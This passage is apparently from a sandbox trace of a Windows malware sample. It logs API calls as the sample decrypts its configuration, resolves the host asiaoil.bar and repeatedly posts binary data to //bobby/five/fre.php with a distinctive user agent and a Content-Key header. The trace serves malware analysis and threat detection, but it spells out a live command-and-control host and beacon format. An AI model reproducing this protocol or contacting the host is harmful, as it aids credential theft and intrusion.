hHeap=0x740000) returned 1 [0293.109] GetProcessHeap () returned 0x740000 [0293.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763a10 | out: hHeap=0x740000) returned 1 [0293.109] GetProcessHeap () returned 0x740000 [0293.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf30 | out: hHeap=0x740000) returned 1 [0293.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1014) returned 0x278 [0293.111] Sleep (dwMilliseconds=0xea60) [0293.115] GetProcessHeap () returned 0x740000 [0293.115] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ce0 [0293.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.117] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0293.132] GetProcessHeap () returned 0x740000 [0293.132] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758508 [0293.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.133] CryptImportKey (in: hProv=0x75d540, pbData=0x758508, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0293.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.134] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.213] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.213] GetProcessHeap () returned 0x740000 [0293.214] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758508 | out: hHeap=0x740000) returned 1 [0293.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.216] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ce0, pdwDataLen=0x19fcfc | out: pbData=0x763ce0, pdwDataLen=0x19fcfc) returned 1 [0293.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.217] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0293.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.233] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0293.233] GetProcessHeap () returned 0x740000 [0293.233] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0293.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.234] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.235] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.236] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.237] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.237] GetProcessHeap () returned 0x740000 [0293.237] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be18 [0293.237] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.237] GetProcessHeap () returned 0x740000 [0293.238] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be18 | out: hHeap=0x740000) returned 1 [0293.238] GetProcessHeap () returned 0x740000 [0293.239] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0293.239] GetProcessHeap () returned 0x740000 [0293.239] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ce0 | out: hHeap=0x740000) returned 1 [0293.239] GetProcessHeap () returned 0x740000 [0293.239] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763d28 [0293.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.354] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d188) returned 1 [0293.361] GetProcessHeap () returned 0x740000 [0293.361] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0293.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.362] CryptImportKey (in: hProv=0x75d188, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0293.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.363] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.364] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.364] GetProcessHeap () returned 0x740000 [0293.476] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0293.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.477] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763d28, pdwDataLen=0x19fcfc | out: pbData=0x763d28, pdwDataLen=0x19fcfc) returned 1 [0293.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.478] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0293.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.479] CryptReleaseContext (hProv=0x75d188, dwFlags=0x0) returned 1 [0293.479] GetProcessHeap () returned 0x740000 [0293.479] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0293.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.480] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0293.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.482] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0293.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.483] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0293.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.484] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0293.484] GetProcessHeap () returned 0x740000 [0293.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be90 [0293.484] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0293.485] GetProcessHeap () returned 0x740000 [0293.485] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0293.485] socket (af=2, type=1, protocol=6) returned 0x27c [0293.486] connect (s=0x27c, name=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0293.614] FreeAddrInfoW (pAddrInfo=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c460*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0293.614] GetProcessHeap () returned 0x740000 [0293.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d100 [0293.614] GetProcessHeap () returned 0x740000 [0293.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0293.615] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0293.615] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0293.615] GetProcessHeap () returned 0x740000 [0293.615] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0293.615] GetProcessHeap () returned 0x740000 [0293.616] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0293.616] GetProcessHeap () returned 0x740000 [0293.616] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763980 [0293.616] GetProcessHeap () returned 0x740000 [0293.616] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0293.617] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0293.618] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0293.618] GetProcessHeap () returned 0x740000 [0293.618] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0293.618] GetProcessHeap () returned 0x740000 [0293.619] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0293.619] send (s=0x27c, buf=0x747868*, len=243, flags=0) returned 243 [0293.619] send (s=0x27c, buf=0x761fd0*, len=159, flags=0) returned 159 [0293.620] GetProcessHeap () returned 0x740000 [0293.620] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0293.620] recv (in: s=0x27c, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 569 [0293.735] GetProcessHeap () returned 0x740000 [0293.735] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0293.735] GetProcessHeap () returned 0x740000 [0293.736] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0293.736] GetProcessHeap () returned 0x740000 [0293.736] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0293.736] GetProcessHeap () returned 0x740000 [0293.736] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d100 | out: hHeap=0x740000) returned 1 [0293.736] closesocket (s=0x27c) returned 0 [0293.738] GetProcessHeap () returned 0x740000 [0293.738] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0293.738] GetProcessHeap () returned 0x740000 [0293.738] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0293.738] GetProcessHeap () returned 0x740000 [0293.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0293.739] GetProcessHeap () returned 0x740000 [0293.739] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be90 | out: hHeap=0x740000) returned 1 [0293.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x101c) returned 0x27c [0293.741] Sleep (dwMilliseconds=0xea60) [0293.754] GetProcessHeap () returned 0x740000 [0293.754] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763bc0 [0293.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0293.776] GetProcessHeap () returned 0x740000 [0293.776] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0293.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.778] CryptImportKey (in: hProv=0x75d540, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0293.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.779] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.780] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.780] GetProcessHeap () returned 0x740000 [0293.781] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0293.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.782] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763bc0, pdwDataLen=0x19fcfc | out: pbData=0x763bc0, pdwDataLen=0x19fcfc) returned 1 [0293.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.783] CryptDestroyKey (hKey=0x74d368) returned 1 [0293.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.784] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0293.784] GetProcessHeap () returned 0x740000 [0293.784] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766c00 [0293.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.903] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.906] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.908] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.910] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.910] GetProcessHeap () returned 0x740000 [0293.910] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf30 [0293.910] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0293.911] GetProcessHeap () returned 0x740000 [0293.911] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf30 | out: hHeap=0x740000) returned 1 [0293.911] GetProcessHeap () returned 0x740000 [0293.911] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766c00 | out: hHeap=0x740000) returned 1 [0293.911] GetProcessHeap () returned 0x740000 [0293.912] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763bc0 | out: hHeap=0x740000) returned 1 [0293.912] GetProcessHeap () returned 0x740000 [0293.912] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763d28 [0293.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0293.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.920] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d100) returned 1 [0293.928] GetProcessHeap () returned 0x740000 [0293.928] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0293.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.929] CryptImportKey (in: hProv=0x75d100, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0293.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.930] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0293.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.931] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.931] GetProcessHeap () returned 0x740000 [0293.932] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0293.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.947] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763d28, pdwDataLen=0x19fcfc | out: pbData=0x763d28, pdwDataLen=0x19fcfc) returned 1 [0293.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.948] CryptDestroyKey (hKey=0x74d768) returned 1 [0293.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0293.949] CryptReleaseContext (hProv=0x75d100, dwFlags=0x0) returned 1 [0293.949] GetProcessHeap () returned 0x740000 [0293.949] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766360 [0293.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.950] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0293.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.951] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0293.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.952] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0293.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0293.953] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0293.953] GetProcessHeap () returned 0x740000 [0293.953] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0293.954] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c020*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0294.411] GetProcessHeap () returned 0x740000 [0294.411] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0294.411] socket (af=2, type=1, protocol=6) returned 0x280 [0294.411] connect (s=0x280, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0294.530] FreeAddrInfoW (pAddrInfo=0x75c020*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0294.530] GetProcessHeap () returned 0x740000 [0294.530] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0294.530] GetProcessHeap () returned 0x740000 [0294.530] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0294.531] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0294.532] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0294.532] GetProcessHeap () returned 0x740000 [0294.532] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0294.532] GetProcessHeap () returned 0x740000 [0294.533] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0294.533] GetProcessHeap () returned 0x740000 [0294.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0294.533] GetProcessHeap () returned 0x740000 [0294.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0294.534] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0294.535] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0294.535] GetProcessHeap () returned 0x740000 [0294.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0294.535] GetProcessHeap () returned 0x740000 [0294.535] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0294.536] send (s=0x280, buf=0x747868*, len=243, flags=0) returned 243 [0294.536] send (s=0x280, buf=0x761fd0*, len=159, flags=0) returned 159 [0294.537] GetProcessHeap () returned 0x740000 [0294.537] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0294.537] recv (in: s=0x280, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 573 [0294.693] GetProcessHeap () returned 0x740000 [0294.694] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0294.694] GetProcessHeap () returned 0x740000 [0294.694] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0294.694] GetProcessHeap () returned 0x740000 [0294.695] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0294.695] GetProcessHeap () returned 0x740000 [0294.695] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0294.695] closesocket (s=0x280) returned 0 [0294.696] GetProcessHeap () returned 0x740000 [0294.696] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0294.696] GetProcessHeap () returned 0x740000 [0294.696] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766360 | out: hHeap=0x740000) returned 1 [0294.696] GetProcessHeap () returned 0x740000 [0294.696] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0294.697] GetProcessHeap () returned 0x740000 [0294.697] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0294.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: 